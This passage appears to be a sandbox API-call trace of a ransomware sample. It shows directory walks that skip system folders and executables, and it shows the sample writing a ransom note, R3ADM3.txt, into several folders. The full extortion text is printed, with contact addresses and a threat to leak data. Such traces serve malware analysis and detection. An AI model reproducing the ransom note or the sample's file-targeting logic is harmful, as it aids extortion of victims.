lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0137.125] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0137.125] WriteFile (in: hFile=0x54c, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.126] CloseHandle (hObject=0x54c) returned 1 [0137.127] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.127] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3c10 | out: hHeap=0xea0000) returned 1 [0137.127] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5772a5f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5772a5f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfc60 [0137.127] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.127] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5772a5f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5772a5f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.127] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.127] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.127] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0137.127] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2=".") returned 1 [0137.127] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="..") returned 1 [0137.127] StrStrIW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="tmp") returned 0x0 [0137.127] StrStrIW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="winnt") returned 0x0 [0137.127] StrStrIW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="temp") returned 0x0 [0137.127] StrStrIW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="thumb") returned 0x0 [0137.127] StrStrIW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="$Recycle.Bin") returned 0x0 [0137.127] StrStrIW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.128] StrStrIW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="System Volume Information") returned 0x0 [0137.128] StrStrIW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="Boot") returned 0x0 [0137.128] StrStrIW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="Windows") returned 0x0 [0137.128] StrStrIW (lpFirst="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpSrch="Trend Micro") returned 0x0 [0137.128] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0137.128] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee8508 [0137.128] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee8530 [0137.128] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xee3c78 [0137.128] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee8530 | out: hHeap=0xea0000) returned 1 [0137.128] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee8508 | out: hHeap=0xea0000) returned 1 [0137.128] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0137.128] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee8508 [0137.128] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xedaab8 [0137.128] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3c78 | out: hHeap=0xea0000) returned 1 [0137.128] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5772a5f0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5772a5f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5772a5f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.128] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.128] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.128] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.128] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.128] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.128] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.128] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.128] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.128] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.129] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5772a5f0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5772a5f0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5772a5f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0137.129] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2e00 | out: hHeap=0xea0000) returned 1 [0137.129] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d88 | out: hHeap=0xea0000) returned 1 [0137.129] FindClose (in: hFindFile=0xecfc60 | out: hFindFile=0xecfc60) returned 1 [0137.129] Sleep (dwMilliseconds=0x32) [0137.220] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3c38 | out: hHeap=0xea0000) returned 1 [0137.220] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0137.220] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0137.220] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeabc8 [0137.220] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeabf0 [0137.220] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeabc8 | out: hHeap=0xea0000) returned 1 [0137.220] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeabc8 [0137.220] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac18 [0137.220] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac40 [0137.220] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac68 [0137.220] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.220] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac68 | out: hHeap=0xea0000) returned 1 [0137.220] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac40 | out: hHeap=0xea0000) returned 1 [0137.220] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac18 | out: hHeap=0xea0000) returned 1 [0137.220] CreateFileW (lpFileName="C:\\Users\\R3ADM3.txt" (normalized: "c:\\users\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0137.221] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0137.221] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.222] CloseHandle (hObject=0x6c4) returned 1 [0137.222] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.222] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeabc8 | out: hHeap=0xea0000) returned 1 [0137.222] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5780ee30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5780ee30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfc60 [0137.222] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.223] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5780ee30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5780ee30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.223] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.223] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0137.223] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0137.223] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0137.223] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz", lpSrch="tmp") returned 0x0 [0137.223] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz", lpSrch="winnt") returned 0x0 [0137.223] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz", lpSrch="temp") returned 0x0 [0137.223] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz", lpSrch="thumb") returned 0x0 [0137.223] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz", lpSrch="$Recycle.Bin") returned 0x0 [0137.223] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.223] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz", lpSrch="System Volume Information") returned 0x0 [0137.223] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz", lpSrch="Boot") returned 0x0 [0137.223] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz", lpSrch="Windows") returned 0x0 [0137.223] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz", lpSrch="Trend Micro") returned 0x0 [0137.223] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.223] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac18 [0137.223] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac40 [0137.223] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0137.223] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac40 | out: hHeap=0xea0000) returned 1 [0137.223] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac18 | out: hHeap=0xea0000) returned 1 [0137.223] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.223] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac18 [0137.223] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcd68 [0137.223] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0137.223] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0137.223] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0137.223] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0137.223] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0137.224] lstrcmpW (lpString1="Default", lpString2=".") returned 1 [0137.224] lstrcmpW (lpString1="Default", lpString2="..") returned 1 [0137.224] StrStrIW (lpFirst="Default", lpSrch="tmp") returned 0x0 [0137.224] StrStrIW (lpFirst="Default", lpSrch="winnt") returned 0x0 [0137.224] StrStrIW (lpFirst="Default", lpSrch="temp") returned 0x0 [0137.224] StrStrIW (lpFirst="Default", lpSrch="thumb") returned 0x0 [0137.224] StrStrIW (lpFirst="Default", lpSrch="$Recycle.Bin") returned 0x0 [0137.224] StrStrIW (lpFirst="Default", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.224] StrStrIW (lpFirst="Default", lpSrch="System Volume Information") returned 0x0 [0137.224] StrStrIW (lpFirst="Default", lpSrch="Boot") returned 0x0 [0137.224] StrStrIW (lpFirst="Default", lpSrch="Windows") returned 0x0 [0137.224] StrStrIW (lpFirst="Default", lpSrch="Trend Micro") returned 0x0 [0137.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac40 [0137.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac68 [0137.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.224] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac68 | out: hHeap=0xea0000) returned 1 [0137.224] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac40 | out: hHeap=0xea0000) returned 1 [0137.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac40 [0137.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3e78 [0137.224] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.224] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0137.224] lstrcmpW (lpString1="Default User", lpString2=".") returned 1 [0137.224] lstrcmpW (lpString1="Default User", lpString2="..") returned 1 [0137.224] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0137.224] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0137.224] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0137.224] StrStrIW (lpFirst="desktop.ini", lpSrch=".UAKXC") returned 0x0 [0137.224] StrStrIW (lpFirst="desktop.ini", lpSrch=".exe") returned 0x0 [0137.224] StrStrIW (lpFirst="desktop.ini", lpSrch=".dll") returned 0x0 [0137.224] StrStrIW (lpFirst="desktop.ini", lpSrch=".lnk") returned 0x0 [0137.224] StrStrIW (lpFirst="desktop.ini", lpSrch=".sys") returned 0x0 [0137.224] StrStrIW (lpFirst="desktop.ini", lpSrch=".msi") returned 0x0 [0137.224] StrStrIW (lpFirst="desktop.ini", lpSrch="R3ADM3.txt") returned 0x0 [0137.225] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac68 [0137.225] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac90 [0137.225] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeacb8 [0137.225] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.225] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeacb8 | out: hHeap=0xea0000) returned 1 [0137.225] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac90 | out: hHeap=0xea0000) returned 1 [0137.225] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac68 | out: hHeap=0xea0000) returned 1 [0137.225] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.225] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac68 [0137.225] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4118 [0137.225] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.225] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.225] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0137.225] lstrcmpW (lpString1="Public", lpString2=".") returned 1 [0137.225] lstrcmpW (lpString1="Public", lpString2="..") returned 1 [0137.225] StrStrIW (lpFirst="Public", lpSrch="tmp") returned 0x0 [0137.225] StrStrIW (lpFirst="Public", lpSrch="winnt") returned 0x0 [0137.225] StrStrIW (lpFirst="Public", lpSrch="temp") returned 0x0 [0137.225] StrStrIW (lpFirst="Public", lpSrch="thumb") returned 0x0 [0137.225] StrStrIW (lpFirst="Public", lpSrch="$Recycle.Bin") returned 0x0 [0137.225] StrStrIW (lpFirst="Public", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.225] StrStrIW (lpFirst="Public", lpSrch="System Volume Information") returned 0x0 [0137.225] StrStrIW (lpFirst="Public", lpSrch="Boot") returned 0x0 [0137.225] StrStrIW (lpFirst="Public", lpSrch="Windows") returned 0x0 [0137.225] StrStrIW (lpFirst="Public", lpSrch="Trend Micro") returned 0x0 [0137.225] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac90 [0137.225] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeacb8 [0137.225] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac90 | out: hHeap=0xea0000) returned 1 [0137.225] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac90 [0137.225] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeace0 [0137.225] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeacb8 | out: hHeap=0xea0000) returned 1 [0137.226] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5780ee30, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5780ee30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5780ee30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.226] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.226] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.226] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.226] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.226] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.226] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.226] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.226] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.226] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.226] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5780ee30, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5780ee30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5780ee30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0137.226] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2e78 | out: hHeap=0xea0000) returned 1 [0137.226] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2e50 | out: hHeap=0xea0000) returned 1 [0137.226] FindClose (in: hFindFile=0xecfc60 | out: hFindFile=0xecfc60) returned 1 [0137.226] Sleep (dwMilliseconds=0x32) [0137.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeabf0 | out: hHeap=0xea0000) returned 1 [0137.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0137.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4188 [0137.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0137.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41f8 [0137.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0137.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41f8 | out: hHeap=0xea0000) returned 1 [0137.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0137.294] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\R3ADM3.txt" (normalized: "c:\\msocache\\all users\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0137.299] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, 